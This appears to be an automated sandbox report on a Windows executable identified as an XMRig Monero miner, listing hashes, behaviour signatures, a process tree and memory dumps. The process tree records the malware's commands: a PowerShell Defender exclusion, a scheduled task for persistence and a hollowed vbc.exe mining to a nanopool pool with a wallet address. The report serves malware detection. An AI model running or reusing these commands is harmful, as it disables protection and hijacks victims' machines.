Analysis

  • max time kernel
    63s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2022 20:13

General

  • Target

    e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe

  • Size

    2.0MB

  • MD5

    458aea46c863b50682715900a848ff26

  • SHA1

    77cd33d12812df7c50bee28a234f9880d8ad2498

  • SHA256

    e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10

  • SHA512

    ec4732d7fc1d961f218f9c19d75f3aea633cb468b400df6fe009f9a5c27c344a1b4790a5422838ff4b8aef0cf9b1bb241d3b6aaeaf2b8f762055a4d09e7d903d

  • SSDEEP

    49152:28DkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3g3jkl83wdS8P+8Vv9:2okfRX4UTDennUI3g34lmi

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe
    "C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:656
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1544
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1344

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/656-80-0x000000001B710000-0x000000001BA0F000-memory.dmp

    Filesize

    3.0MB

  • memory/656-75-0x000007FEFB651000-0x000007FEFB653000-memory.dmp

    Filesize

    8KB

  • memory/656-77-0x000007FEECCE0000-0x000007FEED703000-memory.dmp

    Filesize

    10.1MB

  • memory/656-78-0x000007FEEC180000-0x000007FEECCDD000-memory.dmp

    Filesize

    11.4MB

  • memory/656-79-0x0000000002A14000-0x0000000002A17000-memory.dmp

    Filesize

    12KB

  • memory/656-82-0x0000000002A1B000-0x0000000002A3A000-memory.dmp

    Filesize

    124KB

  • memory/656-81-0x0000000002A14000-0x0000000002A17000-memory.dmp

    Filesize

    12KB

  • memory/1204-88-0x000007FEFE600000-0x000007FEFE61F000-memory.dmp

    Filesize

    124KB

  • memory/1204-92-0x000007FEFF090000-0x000007FEFF0DD000-memory.dmp

    Filesize

    308KB

  • memory/1204-61-0x000007FEFCDE0000-0x000007FEFCE4C000-memory.dmp

    Filesize

    432KB

  • memory/1204-62-0x000007FEFE920000-0x000007FEFE991000-memory.dmp

    Filesize

    452KB

  • memory/1204-63-0x000007FEF63C0000-0x000007FEF64B7000-memory.dmp

    Filesize

    988KB

  • memory/1204-64-0x000007FEFE520000-0x000007FEFE5FB000-memory.dmp

    Filesize

    876KB

  • memory/1204-65-0x000007FEF5440000-0x000007FEF5E2C000-memory.dmp

    Filesize

    9.9MB

  • memory/1204-66-0x00000000001C0000-0x0000000000430000-memory.dmp

    Filesize

    2.4MB

  • memory/1204-67-0x00000000000E0000-0x0000000000123000-memory.dmp

    Filesize

    268KB

  • memory/1204-68-0x000007FEFEF60000-0x000007FEFF08D000-memory.dmp

    Filesize

    1.2MB

  • memory/1204-69-0x000007FEFE310000-0x000007FEFE513000-memory.dmp

    Filesize

    2.0MB

  • memory/1204-70-0x000007FEFB280000-0x000007FEFB2D6000-memory.dmp

    Filesize

    344KB

  • memory/1204-71-0x00000000001C0000-0x0000000000430000-memory.dmp

    Filesize

    2.4MB

  • memory/1204-59-0x000007FEFEE60000-0x000007FEFEEFF000-memory.dmp

    Filesize

    636KB

  • memory/1204-58-0x0000000076BB0000-0x0000000076CAA000-memory.dmp

    Filesize

    1000KB

  • memory/1204-57-0x000007FEFEBB0000-0x000007FEFEC17000-memory.dmp

    Filesize

    412KB

  • memory/1204-56-0x000007FEF64C0000-0x000007FEF655C000-memory.dmp

    Filesize

    624KB

  • memory/1204-72-0x000007FEF6150000-0x000007FEF627C000-memory.dmp

    Filesize

    1.2MB

  • memory/1204-73-0x000007FEFC560000-0x000007FEFC582000-memory.dmp

    Filesize

    136KB

  • memory/1204-76-0x000007FEFE830000-0x000007FEFE907000-memory.dmp

    Filesize

    860KB

  • memory/1204-124-0x00000000001C0000-0x0000000000430000-memory.dmp

    Filesize

    2.4MB

  • memory/1204-87-0x00000000000E0000-0x0000000000123000-memory.dmp

    Filesize

    268KB

  • memory/1204-85-0x000007FEFB060000-0x000007FEFB275000-memory.dmp

    Filesize

    2.1MB

  • memory/1204-55-0x000007FEF69C0000-0x000007FEF6A2F000-memory.dmp

    Filesize

    444KB

  • memory/1204-89-0x000007FEFC410000-0x000007FEFC427000-memory.dmp

    Filesize

    92KB

  • memory/1204-90-0x000007FEFA590000-0x000007FEFA5AC000-memory.dmp

    Filesize

    112KB

  • memory/1204-91-0x000007FEF0B20000-0x000007FEF0B82000-memory.dmp

    Filesize

    392KB

  • memory/1204-60-0x0000000076CB0000-0x0000000076DCF000-memory.dmp

    Filesize

    1.1MB

  • memory/1204-93-0x000007FEF8FA0000-0x000007FEF9004000-memory.dmp

    Filesize

    400KB

  • memory/1204-94-0x000007FEF9010000-0x000007FEF9081000-memory.dmp

    Filesize

    452KB

  • memory/1204-95-0x000007FEFC9E0000-0x000007FEFCA05000-memory.dmp

    Filesize

    148KB

  • memory/1204-96-0x000007FEFA730000-0x000007FEFA757000-memory.dmp

    Filesize

    156KB

  • memory/1204-97-0x000007FEFCF50000-0x000007FEFCF86000-memory.dmp

    Filesize

    216KB

  • memory/1204-98-0x000007FEFC230000-0x000007FEFC28B000-memory.dmp

    Filesize

    364KB

  • memory/1344-116-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-106-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-99-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-118-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-108-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-109-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-111-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-113-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-114-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-102-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-100-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-104-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-121-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-122-0x0000000000260000-0x0000000000280000-memory.dmp

    Filesize

    128KB

  • memory/1344-123-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1344-128-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1344-125-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1344-126-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1344-127-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB